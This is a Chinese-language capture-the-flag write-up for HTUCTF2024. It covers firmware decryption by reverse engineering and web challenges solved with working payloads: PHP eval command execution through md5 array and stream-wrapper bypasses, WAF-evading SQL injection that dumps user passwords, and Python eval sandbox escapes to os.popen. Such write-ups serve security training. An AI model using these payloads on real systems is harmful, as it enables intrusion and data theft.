numbers = [0x48, 0x54, 0x55, 0x43, 0x54, 0x46, 0x7b, 0x57, 0x65, 0x31, 0x63, 0x30, 0x6d, 0x65, 0x5f, 0x74, 0x30, 0x5f, 0x72, 0x33, 0x76, 0x65, 0x72, 0x73, 0x65, 0x5f, 0x65, 0x6e, 0x67, 0x31, 0x6e, 0x65, 0x65, 0x72, 0x31, 0x6e, 0x67, 0x7d]

flag = ''.join(chr(num) for num in numbers)

print(flag)
# HTUCTF{We1c0me_t0_r3verse_eng1neer1ng}

firmware_decryption

題目

你的路由器壞掉了,你提取了路由器原有的韌體(old_firmware.bin),並拿了一份新的韌體(new_firmware.bin)。
但你在升級的時候發現新的韌體是加密的,於是你心想:加密與解密!(解密後的新韌體中包含有flag)
題目難度:難

我的解答:

1.給了一個加密的新韌體包和一個未加密的韌體包,大機率是中間版本這個舊韌體應該是有解密新韌體的程式

HTUCTF2024 河南師範大學招新賽

2.HxD開啟看看舊韌體發現一個真簽名後面有用

HTUCTF2024 河南師範大學招新賽

3.binwalk解包舊韌體後 grep -r download查詢關鍵的詞彙在StartFirmwareDownload.php檔案中發現download

HTUCTF2024 河南師範大學招新賽

4.分析這邊是一個關鍵程式碼,首先獲取/etc/config/image_sign的簽名,讀取到$image_sign變數中,執行encimg -d -i $fw_path是要解密的韌體, -s 後是簽名

HTUCTF2024 河南師範大學招新賽

5.去找到一下那個簽名檔案發現簽名被修改了

HTUCTF2024 河南師範大學招新賽

6.IDA開啟emncig這個檔案分析一下檢視一下列印資訊檢視每個引數的作用 -d是加密 -s是簽名 (簽名和解密有關),大致分析了一下是一個AES256 CBC模式的加密

HTUCTF2024 河南師範大學招新賽

7.現在只要執行這個encimg檔案,這是一個MIPS架構32位大端的程式需要事情qemu模擬執行,但是缺少簽名想起來舊韌體中的signature拿來嘗試解密,解密成功binwalk解包新韌體

HTUCTF2024 河南師範大學招新賽

HTUCTF2024 河南師範大學招新賽

8.檢視flag資料夾下的flag.txt獲得flag

HTUCTF2024 河南師範大學招新賽

WEB

debugme_簽到

題目

你是開發人員嗎?
題目難度:簽到

我的解答:

簽到題,控制檯就有答案。

HTUCTF2024 河南師範大學招新賽

easy_rce

題目

最簡單的RCE,eval函式是非常危險的!
你能逃過md5的圍追堵截嗎?
題目難度:簡單

 <?php
highlight_file(__FILE__);
error_reporting(0);
if($_GET['from']=="HTUCTF"){
    if((md5($_GET['m1']) == md5($_GET['m2'])) && ($_GET['m1'] !== $_GET['m2'])){
        eval($_POST['cmd']);
    }else{
        die("you cant put the same md5 value into here");
    }
}else{
    die("Wrong?Where are you from<br>");
}


?>
Wrong?Where are you from

我的解答:

rce簽到題。直接打

GET傳參(陣列繞過就行):?from=HTUCTF&m1[]=123&m2[]=456

POST傳參(注意:此flag不在根目錄就在當前目錄):cmd=system("cat flag");

HTUCTF{8cdae6c6-2f02-4c3f-9f75-4fd21098600d}

evalPHP

題目

做web開發的首要安全指南:
不要對任何使用者輸入的資料保持信任!!一定要做安全檢查!!!
但很顯然小明覺得嗤之以鼻,他覺得沒人能夠在一個必定報錯的語句上進行執行
你能夠找到方法繞過並獲得flag嗎?
難度:中等偏難

PHP檔案包含漏洞

 <?php
highlight_file(__FILE__);
$data = file_get_contents($_GET['file']);
if($data === "HTUCTF"){
    $cmd = $_POST['cmd'];
    eval($cmd."No_What_are_you_doing!!!");
}else{
    die("no,where are you from");
}
?>

Warning: file_get_contents(): Filename cannot be empty in /var/www/html/index.php on line 3
no,where are you from

我的解答:

提示說了:PHP檔案包含漏洞

當然不說也能看出來哈哈哈,確實貼心!

dirsearch掃後臺發現flag.php,然後可以利用data://偽協議打。

GET傳參:?file=data://text/plain;base64,SFRVQ1RG

注1SFRVQ1RG是HTUCTFbase64加密值。因為需要加密一下,不加密的話正常是打不通的(已試)。

POST傳參:cmd=system("tac flag.php");?>

注2:這裡用tac繞過,正常cat不行。

HTUCTF{15e0cd0a-3f7e-49c3-abaa-d81badb9898e}

evalPHP捲土重來

題目

修復了非預期,這次是真的中等偏難了

 <?php
highlight_file(__FILE__);
$file = $_GET['file'];
if(isset($file)){
    if(preg_match("/^http|^ftp|^https|^data|^phar|^zip/i", $file)){
        die("bad hacker!!!");
    }
    $data = file_get_contents($file);
    if($data === "HTUCTF"){
        $cmd = $_POST['cmd'];
        if(preg_replace("/_|\(|\)|;|\w+|'|\s+|\*/", "", $cmd) === ""){
            eval($cmd."No_What_are_you_doing!!!");
        }else{
            die("No!!!!");
        }
        
    }else{
        die("no,where are you from");
    }
}
?>

我的解答:

GET上傳 ?file=compress.zlib://data://text/plian,HTUCTF

POST上傳 cmd=system('tac f*');__halt_compiler();

HTUCTF{2c392f42-573b-4580-bb4b-613502d6bc04}

easy_SQL

題目

簡單的SQL隱碼攻擊
題目難度:中等

HTUCTF2024 河南師範大學招新賽

我的解答:

有waf,雙寫繞過即可。

payload為:

爆資料庫名:
-admin'uunionnion/**/sselectelect/**/database()#

爆表名:
-admin'uunionnion/**/sselectelect/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema='users'#

爆欄位名:
-admin'uunionnion/**/sselectelect/**/group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='users'#

爆flag:
-admin'uunionnion/**/sselectelect/**/group_concat(passwoorrd)/**/from/**/users#

HTUCTF{41f789fe-643c-4322-be0a-f05eaa584340}

eznode

題目

喜歡我們前後端通吃的javascript嗎

可以先了解一下js和http協議的內容

const { readFileSync } = require('fs')
const express = require('express')

const flag = process.env['FLAG']
const app = express()
app.get("/", (req, res) => {
    res.setHeader('Content-Type', 'text/plain');
    res.send(readFileSync("./app.js", 'utf-8'))
})

app.get("/get_var", (req, res) => {
    let check = req.header("Check")
    if (check && check == [[[[[[[114514]]]]]]]) {
        let vara = req.query['var']
        if (vara && /^[a-zA-Z]+$/.test(vara)) {
            res.send(eval(vara))
        } else {
            res.send('invalid input!')
        }    
    } else {
        res.send("check failed")
    }
})

app.listen(80, () => {
    console.log("listening at 0.0.0.0:80");
});

我的解答:

簡單題。payload如下:

GET傳參 /get_var?var=flag

新增頭 check: 114514

flag{41dd607d-0ecb-475d-96ef-813da205430e}

python_eval_easy

題目

在這次,我們似乎獲得了eval之神的寵愛,他散發出特殊的氣味,把我們帶到了此地
他擁有神秘的力量,能夠幫你把語句變為現實
你知道python如何getshell嗎?
題目難度:中等偏易

我的解答:

控制檯發現/tell?me=xxx

典型的沙盒了。用%過濾。payload如下:

/tell?me=__import__(%22os%22).popen(%22cat%20/f*%22).read()

HTUCTF{a48bcee4-9d76-46a4-8ad4-51a9f44955ea}

EvalIt!!!

題目

這次,看來eval之神的網路不太好啊?你還能夠獲取到eval之神的信任嗎?
題目難度:中等

我的解答:

/tell?me=open('app.py').read()檢視原始碼

len(data) < 28 有長度限制,直接轉到/BackDoorsInGuoql路由下打

import requests
url = "http://xxx.xxx.xxx.xx:xxxxx/BackDoorsInGuoql"
data = {"eval": "str(''.__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('cat /f*').read())"}
response = requests.get(url=url,data=data)
print(response.text)

相關文章